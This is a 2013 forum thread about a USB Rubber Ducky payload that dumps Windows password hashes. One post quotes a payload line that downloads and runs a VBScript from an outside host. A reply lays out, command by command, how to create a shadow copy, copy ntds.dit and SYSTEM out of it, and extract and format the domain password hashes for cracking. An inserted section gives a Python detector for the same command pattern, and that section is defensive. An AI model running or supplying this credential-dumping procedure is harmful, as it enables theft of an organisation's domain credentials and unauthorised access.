Kudzu_Kid Posted April 23, 2013

I was looking at the payload scripts for my Ducky. I found one that I was looking for. It's the "Payload retrieve sam and system from a live file system" script featured here: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---retrieve-sam-and-system-from-a-live-file-system

Naturally, I have an issue with it. The script has a line that says:

"STRING cscript download.vbs http://tools.lanmaster53.com/vssown.vbs"

Nothing in my life is easy! %^} So, naturally, http://tools.lanmaster53.com seems to be off the air right now.

So, I think this will be OK: I'll use my friend Google and find the script elsewhere, and then just edit the script to point to the new URL, once I find one.

The problem now is, I see vssown.vbs scattered on a few different sites, accredited to the same author everywhere I see it, yet when I look at the source, the script appears to be remarkably different in more than one location. Sooo, my questions are:

1) Does anyone actually have this script WORKING?
2) May I have a copy of it? Feel free to edit out any sensitive info if you must (directory names, etc.), but please make it crystal clear what information should be there, e.g. "c:/windows/somedirectory/somewhere/acme.exe" or whatever.

In essence, all I want to do is get the hash on the Ducky and test it for integrity later.

All help, hints, tips appreciated.

Thanks,
Kudzu
no42 Posted April 23, 2013

Step 1: Create Shadow Copy Drive (native command)
Creating the Shadowcopy of the drive CONTAINING the ntds.dit file (generally the C: drive, but it could be somewhere else if the file is big):
vssadmin create shadow /for=[drive letter:]

Step 2: List Drives (native command)
Check the path to the Shadow Copy Volume, i.e. \\?GLOBALROOT|device...
vssadmin list shadows

Step 3: Copy Files (native command)
Copy the NTDS.dit and SYSTEM files out of the Volume(s):
copy \\?GLOBALROOT|device[...]ntds.dit and \\?GLOBALROOT|device[...]SYSTEM to your machine

Step 4: Crack the Hash
Get the libesedb libraries from: http://code.google.com/p/libesedb/downloads/list
Extract and compile the libesedb libraries [./configure, make, make install, ldconfig]
Get the NTDSXtract framework: http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
After installing the libesedb libraries, extract the database tables from ntds.dit:
esedbexport -l /tmp/esedbexport.log -t /tmp/ntds.dit <ntds.dit file>
Extract the hashes/user info/password history:
python dsusers.py /tmp/ntds.dit.export/datatable.3 /tmp/ntds.dit.export/link_table.4 --passwordhashes <SYSTEM file> --passwordhistory <SYSTEM file> --certificates --supplcreds <SYSTEM file> --membership > /tmp/ntds.dit.output
Note: the link_table id could be link_table.4 or link_table.5 depending on the previous output.
Convert the output to pwdump format:
python ntdstopwdump.py /tmp/ntds.dit.output
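Added defensive illustration, not code from the thread or from any poster: the shadow-copy sequence no42 lays out (create a shadow, list it, copy ntds.dit and SYSTEM out of the GLOBALROOT device path) is the command pattern a defender would look for in process-creation telemetry (Windows Security event 4688 with command-line auditing enabled, or Sysmon event 1). The Python below runs that matching over a handful of constructed records; hostnames, accounts, parent processes and paths are made up for the example, and the severity tiers are the example's own choice.

```python
"""Flag the vssadmin / copy-from-shadow credential-dump pattern in process-creation records.

Constructed sample telemetry only; field names mirror the CommandLine / ParentImage
style of Windows 4688 and Sysmon event 1 but nothing here is read from a real log.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    user: str
    parent: str
    command_line: str


# Step 1 / Step 2 of the procedure: vssadmin creating or listing shadow copies.
VSS_CREATE = re.compile(r"\bvssadmin(\.exe)?\s+create\s+shadow\b", re.I)
VSS_LIST = re.compile(r"\bvssadmin(\.exe)?\s+list\s+shadows\b", re.I)
# Step 3: a path that reaches into a shadow copy through the GLOBALROOT device namespace.
SHADOW_PATH = re.compile(r"GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\d+", re.I)
# Credential stores that only make sense to read from a shadow copy (they are locked live).
SENSITIVE_FILE = re.compile(r"\\(ntds\.dit|SYSTEM|SAM|SECURITY)\b", re.I)

# Constructed sample records (hosts, users and paths are invented for this example).
SAMPLE_EVENTS = [
    ProcEvent("dc01", "CORP\\svc_backup", "C:\\Windows\\System32\\cmd.exe",
              "vssadmin create shadow /for=C:"),
    ProcEvent("dc01", "CORP\\svc_backup", "C:\\Windows\\System32\\cmd.exe",
              "vssadmin list shadows"),
    ProcEvent("dc01", "CORP\\svc_backup", "C:\\Windows\\System32\\cmd.exe",
              "copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\ntds.dit C:\\Temp\\ntds.dit"),
    ProcEvent("dc01", "CORP\\svc_backup", "C:\\Windows\\System32\\cmd.exe",
              "copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SYSTEM C:\\Temp\\SYSTEM"),
    ProcEvent("ws07", "CORP\\alice", "C:\\Windows\\explorer.exe",
              "notepad.exe C:\\Users\\alice\\notes.txt"),
    # A backup agent enumerating shadows is routine and should not page anyone on its own.
    ProcEvent("fs02", "CORP\\svc_backup", "C:\\Program Files\\BackupAgent\\agent.exe",
              "vssadmin list shadows"),
]


def classify(command_line: str) -> set:
    """Return the set of pattern tags a single command line matches."""
    tags = set()
    if VSS_CREATE.search(command_line):
        tags.add("vss_create")
    if VSS_LIST.search(command_line):
        tags.add("vss_list")
    # Reading ntds.dit / SYSTEM / SAM via a shadow-copy device path is the high-signal step.
    if SHADOW_PATH.search(command_line) and SENSITIVE_FILE.search(command_line):
        tags.add("shadow_cred_copy")
    return tags


def detect(events) -> dict:
    """Aggregate tags per host and rate each host that matched anything.

    high   : a credential store was copied out of a shadow copy
    medium : a shadow copy was created but no copy of a credential store was seen
    low    : only enumeration (vssadmin list shadows), common for legitimate backup tooling
    Hosts with no matching command lines are omitted.
    """
    per_host = {}
    for ev in events:
        tags = classify(ev.command_line)
        if tags:
            per_host.setdefault(ev.host, set()).update(tags)

    findings = {}
    for host, tags in per_host.items():
        if "shadow_cred_copy" in tags:
            severity = "high"
        elif "vss_create" in tags:
            severity = "medium"
        else:
            severity = "low"
        findings[host] = (severity, sorted(tags))
    return findings


if __name__ == "__main__":
    for host, (severity, tags) in sorted(detect(SAMPLE_EVENTS).items()):
        print(f"{host}: {severity} {tags}")
```

The per-host aggregation matters more than any single regex: `vssadmin list shadows` alone is what a backup product does all day, whereas a shadow being created and then a GLOBALROOT path ending in ntds.dit or SYSTEM being copied from it, on a domain controller, is the full sequence the post describes and deserves the highest tier.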
skysploit Posted May 3, 2013

Here's a link to the actual VSSOwn: http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs

Here's LANMaster53's site: http://lanmaster53.com/